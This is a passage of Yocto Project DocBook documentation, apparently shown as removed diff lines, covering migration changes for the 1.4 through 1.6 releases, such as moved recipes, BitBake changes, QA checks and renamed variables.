- <listitem><para><emphasis><filename>SRC_URI</filename>:</emphasis>
- The <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>,
- <filename>${</filename><link linkend='var-PF'><filename>PF</filename></link><filename>}</filename>,
- <filename>${</filename><link linkend='var-P'><filename>P</filename></link><filename>}</filename>,
- and <filename>FILE_DIRNAME</filename> directories have been
- dropped from the default value of the
- <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
- variable, which is used as the search path for finding files
- referred to in
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>.
- If you have a recipe that relied upon these directories,
- which would be unusual, then you will need to add the
- appropriate paths within the recipe or, alternatively,
- rearrange the files.
- The most common locations are still covered by
- <filename>${BP}</filename>, <filename>${BPN}</filename>,
- and "files", which all remain in the default value of
- <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-target-package-management-with-rpm'>
- <title>Target Package Management with RPM</title>
-
- <para>
- If runtime package management is enabled and the RPM backend
- is selected, Smart is now installed for package download, dependency
- resolution, and upgrades instead of Zypper.
- For more information on how to use Smart, run the following command
- on the target:
- <literallayout class='monospaced'>
- smart --help
- </literallayout>
- </para>
- </section>
-
- <section id='migration-1.4-recipes-moved'>
- <title>Recipes Moved</title>
-
- <para>
- The following recipes were moved from their previous locations
- because they are no longer used by anything in
- the OpenEmbedded-Core:
- <itemizedlist>
- <listitem><para><emphasis><filename>clutter-box2d</filename>:</emphasis>
- Now resides in the <filename>meta-oe</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>evolution-data-server</filename>:</emphasis>
- Now resides in the <filename>meta-gnome</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>gthumb</filename>:</emphasis>
- Now resides in the <filename>meta-gnome</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>gtkhtml2</filename>:</emphasis>
- Now resides in the <filename>meta-oe</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>gupnp</filename>:</emphasis>
- Now resides in the <filename>meta-multimedia</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>gypsy</filename>:</emphasis>
- Now resides in the <filename>meta-oe</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>libcanberra</filename>:</emphasis>
- Now resides in the <filename>meta-gnome</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>libgdata</filename>:</emphasis>
- Now resides in the <filename>meta-gnome</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>libmusicbrainz</filename>:</emphasis>
- Now resides in the <filename>meta-multimedia</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>metacity</filename>:</emphasis>
- Now resides in the <filename>meta-gnome</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>polkit</filename>:</emphasis>
- Now resides in the <filename>meta-oe</filename> layer.
- </para></listitem>
- <listitem><para><emphasis><filename>zeroconf</filename>:</emphasis>
- Now resides in the <filename>meta-networking</filename> layer.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.4-removals-and-renames'>
- <title>Removals and Renames</title>
-
- <para>
- The following list shows what has been removed or renamed:
- <itemizedlist>
- <listitem><para><emphasis><filename>evieext</filename>:</emphasis>
- Removed because it has been removed from
- <filename>xserver</filename> since 2008.
- </para></listitem>
- <listitem><para><emphasis>Gtk+ DirectFB:</emphasis>
- Removed support because upstream Gtk+ no longer supports it
- as of version 2.18.
- </para></listitem>
- <listitem><para><emphasis><filename>libxfontcache / xfontcacheproto</filename>:</emphasis>
- Removed because they were removed from the Xorg server in 2008.
- </para></listitem>
- <listitem><para><emphasis><filename>libxp / libxprintapputil / libxprintutil / printproto</filename>:</emphasis>
- Removed because the XPrint server was removed from
- Xorg in 2008.
- </para></listitem>
- <listitem><para><emphasis><filename>libxtrap / xtrapproto</filename>:</emphasis>
- Removed because their functionality was broken upstream.
- </para></listitem>
- <listitem><para><emphasis>linux-yocto 3.0 kernel:</emphasis>
- Removed with linux-yocto 3.8 kernel being added.
- The linux-yocto 3.2 and linux-yocto 3.4 kernels remain
- as part of the release.
- </para></listitem>
- <listitem><para><emphasis><filename>lsbsetup</filename>:</emphasis>
- Removed with functionality now provided by
- <filename>lsbtest</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>matchbox-stroke</filename>:</emphasis>
- Removed because it was never more than a proof-of-concept.
- </para></listitem>
- <listitem><para><emphasis><filename>matchbox-wm-2 / matchbox-theme-sato-2</filename>:</emphasis>
- Removed because they are not maintained.
- However, <filename>matchbox-wm</filename> and
- <filename>matchbox-theme-sato</filename> are still
- provided.
- </para></listitem>
- <listitem><para><emphasis><filename>mesa-dri</filename>:</emphasis>
- Renamed to <filename>mesa</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>mesa-xlib</filename>:</emphasis>
- Removed because it was no longer useful.
- </para></listitem>
- <listitem><para><emphasis><filename>mutter</filename>:</emphasis>
- Removed because nothing ever uses it and the recipe is
- very old.
- </para></listitem>
- <listitem><para><emphasis><filename>orinoco-conf</filename>:</emphasis>
- Removed because it has become obsolete.
- </para></listitem>
- <listitem><para><emphasis><filename>update-modules</filename>:</emphasis>
- Removed because it is no longer used.
- The kernel module <filename>postinstall</filename> and
- <filename>postrm</filename> scripts can now do the same
- task without the use of this script.
- </para></listitem>
- <listitem><para><emphasis><filename>web</filename>:</emphasis>
- Removed because it is not maintained. Superseded by
- <filename>web-webkit</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>xf86bigfontproto</filename>:</emphasis>
- Removed because upstream it has been disabled by default
- since 2007.
- Nothing uses <filename>xf86bigfontproto</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>xf86rushproto</filename>:</emphasis>
- Removed because its dependency in
- <filename>xserver</filename> was spurious and it was
- removed in 2005.
- </para></listitem>
- <listitem><para><emphasis><filename>zypper / libzypp / sat-solver</filename>:</emphasis>
- Removed and been functionally replaced with Smart
- (<filename>python-smartpm</filename>) when RPM packaging
- is used and package management is enabled on the target.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.5-release'>
- <title>Moving to the Yocto Project 1.5 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 1.5 Release from the prior release.
- </para>
-
- <section id='migration-1.5-host-dependency-changes'>
- <title>Host Dependency Changes</title>
-
- <para>
- The OpenEmbedded build system now has some additional requirements
- on the host system:
- <itemizedlist>
- <listitem><para>Python 2.7.3+</para></listitem>
- <listitem><para>Tar 1.24+</para></listitem>
- <listitem><para>Git 1.7.8+</para></listitem>
- <listitem><para>Patched version of Make if you are using
- 3.82.
- Most distributions that provide Make 3.82 use the patched
- version.</para></listitem>
- </itemizedlist>
- If the Linux distribution you are using on your build host
- does not provide packages for these, you can install and use
- the Buildtools tarball, which provides an SDK-like environment
- containing them.
- </para>
-
- <para>
- For more information on this requirement, see the
- "<link linkend='required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</link>"
- section.
- </para>
- </section>
-
- <section id='migration-1.5-atom-pc-bsp'>
- <title><filename>atom-pc</filename> Board Support Package (BSP)</title>
-
- <para>
- The <filename>atom-pc</filename> hardware reference BSP has been
- replaced by a <filename>genericx86</filename> BSP.
- This BSP is not necessarily guaranteed to work on all x86
- hardware, but it will run on a wider range of systems than the
- <filename>atom-pc</filename> did.
- <note>
- Additionally, a <filename>genericx86-64</filename> BSP has
- been added for 64-bit Atom systems.
- </note>
- </para>
- </section>
-
- <section id='migration-1.5-bitbake'>
- <title>BitBake</title>
-
- <para>
- The following changes have been made that relate to BitBake:
- <itemizedlist>
- <listitem><para>
- BitBake now supports a <filename>_remove</filename>
- operator.
- The addition of this operator means you will have to
- rename any items in recipe space (functions, variables)
- whose names currently contain
- <filename>_remove_</filename> or end with
- <filename>_remove</filename> to avoid unexpected behavior.
- </para></listitem>
- <listitem><para>
- BitBake's global method pool has been removed.
- This method is not particularly useful and led to clashes
- between recipes containing functions that had the
- same name.</para></listitem>
- <listitem><para>
- The "none" server backend has been removed.
- The "process" server backend has been serving well as the
- default for a long time now.</para></listitem>
- <listitem><para>
- The <filename>bitbake-runtask</filename> script has been
- removed.</para></listitem>
- <listitem><para>
- <filename>${</filename><link linkend='var-P'><filename>P</filename></link><filename>}</filename>
- and
- <filename>${</filename><link linkend='var-PF'><filename>PF</filename></link><filename>}</filename>
- are no longer added to
- <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
- by default in <filename>bitbake.conf</filename>.
- These version-specific <filename>PROVIDES</filename>
- items were seldom used.
- Attempting to use them could result in two versions being
- built simultaneously rather than just one version due to
- the way BitBake resolves dependencies.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.5-qa-warnings'>
- <title>QA Warnings</title>
-
- <para>
- The following changes have been made to the package QA checks:
- <itemizedlist>
- <listitem><para>
- If you have customized
- <link linkend='var-ERROR_QA'><filename>ERROR_QA</filename></link>
- or <link linkend='var-WARN_QA'><filename>WARN_QA</filename></link>
- values in your configuration, check that they contain all of
- the issues that you wish to be reported.
- Previous Yocto Project versions contained a bug that meant
- that any item not mentioned in <filename>ERROR_QA</filename>
- or <filename>WARN_QA</filename> would be treated as a
- warning.
- Consequently, several important items were not already in
- the default value of <filename>WARN_QA</filename>.
- All of the possible QA checks are now documented in the
- "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
- section.</para></listitem>
- <listitem><para>
- An additional QA check has been added to check if
- <filename>/usr/share/info/dir</filename> is being installed.
- Your recipe should delete this file within
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- if "make install" is installing it.
- </para></listitem>
- <listitem><para>
- If you are using the buildhistory class, the check for the
- package version going backwards is now controlled using a
- standard QA check.
- Thus, if you have customized your
- <filename>ERROR_QA</filename> or
- <filename>WARN_QA</filename> values and still wish to have
- this check performed, you should add
- "version-going-backwards" to your value for one or the
- other variables depending on how you wish it to be handled.
- See the documented QA checks in the
- "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
- section.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.5-directory-layout-changes'>
- <title>Directory Layout Changes</title>
-
- <para>
- The following directory changes exist:
- <itemizedlist>
- <listitem><para>
- Output SDK installer files are now named to include the
- image name and tuning architecture through the
- <link linkend='var-SDK_NAME'><filename>SDK_NAME</filename></link>
- variable.</para></listitem>
- <listitem><para>
- Images and related files are now installed into a directory
- that is specific to the machine, instead of a parent
- directory containing output files for multiple machines.
- The
- <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>
- variable continues to point to the directory containing
- images for the current
- <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
- and should be used anywhere there is a need to refer to
- this directory.
- The <filename>runqemu</filename> script now uses this
- variable to find images and kernel binaries and will use
- BitBake to determine the directory.
- Alternatively, you can set the
- <filename>DEPLOY_DIR_IMAGE</filename> variable in the
- external environment.</para></listitem>
- <listitem><para>
- When buildhistory is enabled, its output is now written
- under the
- <link linkend='build-directory'>Build Directory</link>
- rather than
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>.
- Doing so makes it easier to delete
- <filename>TMPDIR</filename> and preserve the build history.
- Additionally, data for produced SDKs is now split by
- <link linkend='var-IMAGE_NAME'><filename>IMAGE_NAME</filename></link>.
- </para></listitem>
- <listitem><para>
- The <filename>pkgdata</filename> directory produced as
- part of the packaging process has been collapsed into a
- single machine-specific directory.
- This directory is located under
- <filename>sysroots</filename> and uses a machine-specific
- name (i.e.
- <filename>tmp/sysroots/<replaceable>machine</replaceable>/pkgdata</filename>).
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.5-shortened-git-srcrev-values'>
- <title>Shortened Git <filename>SRCREV</filename> Values</title>
-
- <para>
- BitBake will now shorten revisions from Git repositories from the
- normal 40 characters down to 10 characters within
- <link linkend='var-SRCPV'><filename>SRCPV</filename></link>
- for improved usability in path and file names.
- This change should be safe within contexts where these revisions
- are used because the chances of spatially close collisions
- is very low.
- Distant collisions are not a major issue in the way
- the values are used.
- </para>
- </section>
-
- <section id='migration-1.5-image-features'>
- <title><filename>IMAGE_FEATURES</filename></title>
-
- <para>
- The following changes have been made that relate to
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>:
- <itemizedlist>
- <listitem><para>
- The value of <filename>IMAGE_FEATURES</filename> is now
- validated to ensure invalid feature items are not added.
- Some users mistakenly add package names to this variable
- instead of using
- <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>
- in order to have the package added to the image, which does
- not work.
- This change is intended to catch those kinds of situations.
- Valid <filename>IMAGE_FEATURES</filename> are drawn from
- <filename>PACKAGE_GROUP</filename> definitions,
- <link linkend='var-COMPLEMENTARY_GLOB'><filename>COMPLEMENTARY_GLOB</filename></link>
- and a new "validitems" varflag on
- <filename>IMAGE_FEATURES</filename>.
- The "validitems" varflag change allows additional features
- to be added if they are not provided using the previous
- two mechanisms.
- </para></listitem>
- <listitem><para>
- The previously deprecated "apps-console-core"
- <filename>IMAGE_FEATURES</filename> item is no longer
- supported.
- Add "splash" to <filename>IMAGE_FEATURES</filename> if you
- wish to have the splash screen enabled, since this is
- all that apps-console-core was doing.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.5-run'>
- <title><filename>/run</filename></title>
-
- <para>
- The <filename>/run</filename> directory from the Filesystem
- Hierarchy Standard 3.0 has been introduced.
- You can find some of the implications for this change
- <ulink url='http://cgit.openembedded.org/openembedded-core/commit/?id=0e326280a15b0f2c4ef2ef4ec441f63f55b75873'>here</ulink>.
- The change also means that recipes that install files to
- <filename>/var/run</filename> must be changed.
- You can find a guide on how to make these changes
- <ulink url='http://permalink.gmane.org/gmane.comp.handhelds.openembedded/58530'>here</ulink>.
- </para>
- </section>
-
- <section id='migration-1.5-removal-of-package-manager-database-within-image-recipes'>
- <title>Removal of Package Manager Database Within Image Recipes</title>
-
- <para>
- The image <filename>core-image-minimal</filename> no longer adds
- <filename>remove_packaging_data_files</filename> to
- <link linkend='var-ROOTFS_POSTPROCESS_COMMAND'><filename>ROOTFS_POSTPROCESS_COMMAND</filename></link>.
- This addition is now handled automatically when "package-management"
- is not in
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
- If you have custom image recipes that make this addition,
- you should remove the lines, as they are not needed and might
- interfere with correct operation of postinstall scripts.
- </para>
- </section>
-
- <section id='migration-1.5-images-now-rebuild-only-on-changes-instead-of-every-time'>
- <title>Images Now Rebuild Only on Changes Instead of Every Time</title>
-
- <para>
- The
- <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
- and other related image
- construction tasks are no longer marked as "nostamp".
- Consequently, they will only be re-executed when their inputs have
- changed.
- Previous versions of the OpenEmbedded build system always rebuilt
- the image when requested rather when necessary.
- </para>
- </section>
-
- <section id='migration-1.5-task-recipes'>
- <title>Task Recipes</title>
-
- <para>
- The previously deprecated <filename>task.bbclass</filename> has
- now been dropped.
- For recipes that previously inherited from this class, you should
- rename them from <filename>task-*</filename> to
- <filename>packagegroup-*</filename> and inherit packagegroup
- instead.
- </para>
-
- <para>
- For more information, see the
- "<link linkend='ref-classes-packagegroup'><filename>packagegroup.bbclass</filename></link>"
- section.
- </para>
- </section>
-
- <section id='migration-1.5-busybox'>
- <title>BusyBox</title>
-
- <para>
- By default, we now split BusyBox into two binaries:
- one that is suid root for those components that need it, and
- another for the rest of the components.
- Splitting BusyBox allows for optimization that eliminates the
- <filename>tinylogin</filename> recipe as recommended by upstream.
- You can disable this split by setting
- <link linkend='var-BUSYBOX_SPLIT_SUID'><filename>BUSYBOX_SPLIT_SUID</filename></link>
- to "0".
- </para>
- </section>
-
- <section id='migration-1.5-automated-image-testing'>
- <title>Automated Image Testing</title>
-
- <para>
- A new automated image testing framework has been added
- through the
- <link linkend='ref-classes-testimage*'><filename>testimage.bbclass</filename></link>
- class.
- This framework replaces the older
- <filename>imagetest-qemu</filename> framework.
- </para>
-
- <para>
- You can learn more about performing automated image tests in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='migration-1.5-build-history'>
- <title>Build History</title>
-
- <para>
- Following are changes to Build History:
- <itemizedlist>
- <listitem><para>
- Installed package sizes:
- <filename>installed-package-sizes.txt</filename> for an
- image now records the size of the files installed by each
- package instead of the size of each compressed package
- archive file.</para></listitem>
- <listitem><para>
- The dependency graphs (<filename>depends*.dot</filename>)
- now use the actual package names instead of replacing
- dashes, dots and plus signs with underscores.
- </para></listitem>
- <listitem><para>
- The <filename>buildhistory-diff</filename> and
- <filename>buildhistory-collect-srcrevs</filename>
- utilities have improved command-line handling.
- Use the <filename>--help</filename> option for
- each utility for more information on the new syntax.
- </para></listitem>
- </itemizedlist>
- For more information on Build History, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='migration-1.5-udev'>
- <title><filename>udev</filename></title>
-
- <para>
- Following are changes to <filename>udev</filename>:
- <itemizedlist>
- <listitem><para>
- <filename>udev</filename> no longer brings in
- <filename>udev-extraconf</filename> automatically
- through
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
- since this was originally intended to be optional.
- If you need the extra rules, then add
- <filename>udev-extraconf</filename> to your image.
- </para></listitem>
- <listitem><para>
- <filename>udev</filename> no longer brings in
- <filename>pciutils-ids</filename> or
- <filename>usbutils-ids</filename> through
- <filename>RRECOMMENDS</filename>.
- These are not needed by <filename>udev</filename> itself
- and removing them saves around 350KB.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.5-removed-renamed-recipes'>
- <title>Removed and Renamed Recipes</title>
-
- <itemizedlist>
- <listitem><para>
- The <filename>linux-yocto</filename> 3.2 kernel has been
- removed.</para></listitem>
- <listitem><para>
- <filename>libtool-nativesdk</filename> has been renamed to
- <filename>nativesdk-libtool</filename>.</para></listitem>
- <listitem><para>
- <filename>tinylogin</filename> has been removed.
- It has been replaced by a suid portion of Busybox.
- See the
- "<link linkend='migration-1.5-busybox'>BusyBox</link>" section
- for more information.</para></listitem>
- <listitem><para>
- <filename>external-python-tarball</filename> has been renamed
- to <filename>buildtools-tarball</filename>.
- </para></listitem>
- <listitem><para>
- <filename>web-webkit</filename> has been removed.
- It has been functionally replaced by
- <filename>midori</filename>.</para></listitem>
- <listitem><para>
- <filename>imake</filename> has been removed.
- It is no longer needed by any other recipe.
- </para></listitem>
- <listitem><para>
- <filename>transfig-native</filename> has been removed.
- It is no longer needed by any other recipe.
- </para></listitem>
- <listitem><para>
- <filename>anjuta-remote-run</filename> has been removed.
- Anjuta IDE integration has not been officially supported for
- several releases.</para></listitem>
- </itemizedlist>
- </section>
-
- <section id='migration-1.5-other-changes'>
- <title>Other Changes</title>
-
- <para>
- Following is a list of short entries describing other changes:
- <itemizedlist>
- <listitem><para>
- <filename>run-postinsts</filename>: Make this generic.
- </para></listitem>
- <listitem><para>
- <filename>base-files</filename>: Remove the unnecessary
- <filename>media/</filename><replaceable>xxx</replaceable> directories.
- </para></listitem>
- <listitem><para>
- <filename>alsa-state</filename>: Provide an empty
- <filename>asound.conf</filename> by default.
- </para></listitem>
- <listitem><para>
- <filename>classes/image</filename>: Ensure
- <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>
- supports pre-renamed package names.</para></listitem>
- <listitem><para>
- <filename>classes/rootfs_rpm</filename>: Implement
- <filename>BAD_RECOMMENDATIONS</filename> for RPM.
- </para></listitem>
- <listitem><para>
- <filename>systemd</filename>: Remove
- <filename>systemd_unitdir</filename> if
- <filename>systemd</filename> is not in
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
- </para></listitem>
- <listitem><para>
- <filename>systemd</filename>: Remove
- <filename>init.d</filename> dir if
- <filename>systemd</filename> unit file is present and
- <filename>sysvinit</filename> is not a distro feature.
- </para></listitem>
- <listitem><para>
- <filename>libpam</filename>: Deny all services for the
- <filename>OTHER</filename> entries.
- </para></listitem>
- <listitem><para>
- <filename>image.bbclass</filename>: Move
- <filename>runtime_mapping_rename</filename> to avoid
- conflict with <filename>multilib</filename>.
- See
- <ulink url='https://bugzilla.yoctoproject.org/show_bug.cgi?id=4993'><filename>YOCTO #4993</filename></ulink>
- in Bugzilla for more information.
- </para></listitem>
- <listitem><para>
- <filename>linux-dtb</filename>: Use kernel build system
- to generate the <filename>dtb</filename> files.
- </para></listitem>
- <listitem><para>
- <filename>kern-tools</filename>: Switch from guilt to
- new <filename>kgit-s2q</filename> tool.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.6-release'>
- <title>Moving to the Yocto Project 1.6 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 1.6 Release from the prior release.
- </para>
-
-
- <section id='migration-1.6-archiver-class'>
- <title><filename>archiver</filename> Class</title>
-
- <para>
- The
- <link linkend='ref-classes-archiver'><filename>archiver</filename></link>
- class has been rewritten and its configuration has been simplified.
- For more details on the source archiver, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='migration-1.6-packaging-changes'>
- <title>Packaging Changes</title>
-
- <para>
- The following packaging changes have been made:
- <itemizedlist>
- <listitem><para>
- The <filename>binutils</filename> recipe no longer produces
- a <filename>binutils-symlinks</filename> package.
- <filename>update-alternatives</filename> is now used to
- handle the preferred <filename>binutils</filename>
- variant on the target instead.
- </para></listitem>
- <listitem><para>
- The tc (traffic control) utilities have been split out of
- the main <filename>iproute2</filename> package and put
- into the <filename>iproute2-tc</filename> package.
- </para></listitem>
- <listitem><para>
- The <filename>gtk-engines</filename> schemas have been
- moved to a dedicated
- <filename>gtk-engines-schemas</filename> package.
- </para></listitem>
- <listitem><para>
- The <filename>armv7a</filename> with thumb package
- architecture suffix has changed.
- The suffix for these packages with the thumb
- optimization enabled is "t2" as it should be.
- Use of this suffix was not the case in the 1.5 release.
- Architecture names will change within package feeds as a
- result.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.6-bitbake'>
- <title>BitBake</title>
-
- <para>
- The following changes have been made to
- <link linkend='bitbake-term'>BitBake</link>.
- </para>
-
- <section id='migration-1.6-matching-branch-requirement-for-git-fetching'>
- <title>Matching Branch Requirement for Git Fetching</title>
-
- <para>
- When fetching source from a Git repository using
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>,
- BitBake will now validate the
- <link linkend='var-SRCREV'><filename>SRCREV</filename></link>
- value against the branch.
- You can specify the branch using the following form:
- <literallayout class='monospaced'>
- SRC_URI = "git://server.name/repository;branch=<replaceable>branchname</replaceable>"
- </literallayout>
- If you do not specify a branch, BitBake looks
- in the default "master" branch.
- </para>
-
- <para>
- Alternatively, if you need to bypass this check (e.g.
- if you are fetching a revision corresponding to a tag that
- is not on any branch), you can add ";nobranch=1" to
- the end of the URL within <filename>SRC_URI</filename>.
- </para>
- </section>
-
- <section id='migration-1.6-bitbake-deps'>
- <title>Python Definition substitutions</title>
-
- <para>
- BitBake had some previously deprecated Python definitions
- within its <filename>bb</filename> module removed.
- You should use their sub-module counterparts instead:
- <itemizedlist>
- <listitem><para><filename>bb.MalformedUrl</filename>:
- Use <filename>bb.fetch.MalformedUrl</filename>.
- </para></listitem>
- <listitem><para><filename>bb.encodeurl</filename>:
- Use <filename>bb.fetch.encodeurl</filename>.
- </para></listitem>
- <listitem><para><filename>bb.decodeurl</filename>:
- Use <filename>bb.fetch.decodeurl</filename>
- </para></listitem>
- <listitem><para><filename>bb.mkdirhier</filename>:
- Use <filename>bb.utils.mkdirhier</filename>.
- </para></listitem>
- <listitem><para><filename>bb.movefile</filename>:
- Use <filename>bb.utils.movefile</filename>.
- </para></listitem>
- <listitem><para><filename>bb.copyfile</filename>:
- Use <filename>bb.utils.copyfile</filename>.
- </para></listitem>
- <listitem><para><filename>bb.which</filename>:
- Use <filename>bb.utils.which</filename>.
- </para></listitem>
- <listitem><para><filename>bb.vercmp_string</filename>:
- Use <filename>bb.utils.vercmp_string</filename>.
- </para></listitem>
- <listitem><para><filename>bb.vercmp</filename>:
- Use <filename>bb.utils.vercmp</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.6-bitbake-fetcher'>
- <title>SVK Fetcher</title>
-
- <para>
- The SVK fetcher has been removed from BitBake.
- </para>
- </section>
-
- <section id='migration-1.6-bitbake-console-output'>
- <title>Console Output Error Redirection</title>
-
- <para>
- The BitBake console UI will now output errors to
- <filename>stderr</filename> instead of
- <filename>stdout</filename>.
- Consequently, if you are piping or redirecting the output of
- <filename>bitbake</filename> to somewhere else, and you wish
- to retain the errors, you will need to add
- <filename>2>&amp;1</filename> (or something similar) to the
- end of your <filename>bitbake</filename> command line.
- </para>
- </section>
-
- <section id='migration-1.6-task-taskname-overrides'>
- <title><filename>task-</filename><replaceable>taskname</replaceable> Overrides</title>
-
- <para>
- <filename>task-</filename><replaceable>taskname</replaceable> overrides have been
- adjusted so that tasks whose names contain underscores have the
- underscores replaced by hyphens for the override so that they
- now function properly.
- For example, the task override for
- <link linkend='ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></link>
- is <filename>task-populate-sdk</filename>.
- </para>
- </section>
- </section>
-
- <section id='migration-1.6-variable-changes'>
- <title>Changes to Variables</title>
-
- <para>
- The following variables have changed.
- For information on the OpenEmbedded build system variables, see the
- "<link linkend='ref-variables-glos'>Variables Glossary</link>" Chapter.
- </para>
-
- <section id='migration-1.6-variable-changes-TMPDIR'>
- <title><filename>TMPDIR</filename></title>
-
- <para>
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- can no longer be on an NFS mount.
- NFS does not offer full POSIX locking and inode consistency
- and can cause unexpected issues if used to store
- <filename>TMPDIR</filename>.
- </para>
-
- <para>
- The check for this occurs on startup.
- If <filename>TMPDIR</filename> is detected on an NFS mount,
- an error occurs.
- </para>
- </section>
-
- <section id='migration-1.6-variable-changes-PRINC'>
- <title><filename>PRINC</filename></title>
-
- <para>
- The <filename>PRINC</filename>
- variable has been deprecated and triggers a warning if
- detected during a build.
- For
- <link linkend='var-PR'><filename>PR</filename></link>
- increments on changes, use the PR service instead.
- You can find out more about this service in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#working-with-a-pr-service'>Working With a PR Service</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id='migration-1.6-variable-changes-IMAGE_TYPES'>
- <title><filename>IMAGE_TYPES</filename></title>
-
- <para>
- The "sum.jffs2" option for
- <link linkend='var-IMAGE_TYPES'><filename>IMAGE_TYPES</filename></link>
- has been replaced by the "jffs2.sum" option, which fits the
- processing order.
- </para>
- </section>
-
- <section id='migration-1.6-variable-changes-COPY_LIC_MANIFEST'>
- <title><filename>COPY_LIC_MANIFEST</filename></title>
-
- <para>
- The
- <link linkend='var-COPY_LIC_MANIFEST'><filename>COPY_LIC_MANIFEST</filename></link>
- variable must
- now be set to "1" rather than any value in order to enable
- it.
- </para>
- </section>
-
- <section id='migration-1.6-variable-changes-COPY_LIC_DIRS'>
- <title><filename>COPY_LIC_DIRS</filename></title>
-
- <para>
- The
- <link linkend='var-COPY_LIC_DIRS'><filename>COPY_LIC_DIRS</filename></link>
- variable must
- now be set to "1" rather than any value in order to enable
- it.
- </para>
- </section>
-
- <section id='migration-1.6-variable-changes-PACKAGE_GROUP'>
- <title><filename>PACKAGE_GROUP</filename></title>
-
- <para>
- The
- <filename>PACKAGE_GROUP</filename> variable has been renamed to
- <link linkend='var-FEATURE_PACKAGES'><filename>FEATURE_PACKAGES</filename></link>
- to more accurately reflect its purpose.
- You can still use <filename>PACKAGE_GROUP</filename> but
- the OpenEmbedded build system produces a warning message when
- it encounters the variable.
- </para>
- </section>
-
- <section id='migration-1.6-variable-changes-variable-entry-behavior'>
- <title>Preprocess and Post Process Command Variable Behavior</title>
-
- <para>
- The following variables now expect a semicolon separated
- list of functions to call and not arbitrary shell commands:
- <literallayout class='monospaced'>
- <link linkend='var-ROOTFS_PREPROCESS_COMMAND'>ROOTFS_PREPROCESS_COMMAND</link>
- <link linkend='var-ROOTFS_POSTPROCESS_COMMAND'>ROOTFS_POSTPROCESS_COMMAND</link>
- <link linkend='var-SDK_POSTPROCESS_COMMAND'>SDK_POSTPROCESS_COMMAND</link>
- <link linkend='var-POPULATE_SDK_POST_TARGET_COMMAND'>POPULATE_SDK_POST_TARGET_COMMAND</link>
- <link linkend='var-POPULATE_SDK_POST_HOST_COMMAND'>POPULATE_SDK_POST_HOST_COMMAND</link>
- <link linkend='var-IMAGE_POSTPROCESS_COMMAND'>IMAGE_POSTPROCESS_COMMAND</link>
- <link linkend='var-IMAGE_PREPROCESS_COMMAND'>IMAGE_PREPROCESS_COMMAND</link>
- <link linkend='var-ROOTFS_POSTUNINSTALL_COMMAND'>ROOTFS_POSTUNINSTALL_COMMAND</link>
- <link linkend='var-ROOTFS_POSTINSTALL_COMMAND'>ROOTFS_POSTINSTALL_COMMAND</link>
- </literallayout>
- For migration purposes, you can simply wrap shell commands in
